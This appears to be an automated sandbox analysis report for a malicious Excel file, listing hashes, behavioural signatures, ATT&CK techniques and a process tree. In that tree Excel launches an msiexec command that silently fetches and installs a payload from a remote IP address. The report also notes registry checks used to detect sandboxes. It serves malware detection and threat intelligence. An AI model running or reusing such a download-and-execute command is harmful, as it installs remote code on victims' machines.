Analysis

  • max time kernel
    260s
  • max time network
    287s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    21-11-2020 16:02

General

  • Target

    20.06.2019_013.93.xls

  • Size

    168KB

  • MD5

    50ff2a788c7ecc088e703cda874394cb

  • SHA1

    2755cb7a957bae5c543147ab3f403a2918e66e56

  • SHA256

    0e91e6e17f8c8e2f1ae29e13f116c8611cb7679607695eed355025295fb1999a

  • SHA512

    249321f005f5b0c0f3172009ec99c441c1830b11d923f557cea4e34587e7f76468d536e7fc2b302c52e07332fc9c959223e7eaa91f9be87cbb1434bf32ff74fd

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\20.06.2019_013.93.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\SYSTEM32\msiexec.exe
      msiexec /q step1=commonl step2=files /i http://54.38.127.28/pm4
      2⤵
      • Process spawned unexpected child process
      • Use of msiexec (install) with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:3976
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:2160

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/492-0-0x00007FF9A7240000-0x00007FF9A7877000-memory.dmp
    Filesize

    6.2MB

  • memory/492-5-0x0000021152CA8000-0x0000021152CB1000-memory.dmp
    Filesize

    36KB

  • memory/3976-6-0x0000000000000000-mapping.dmp
  • memory/3976-7-0x000002BFFEC40000-0x000002BFFEC44000-memory.dmp
    Filesize

    16KB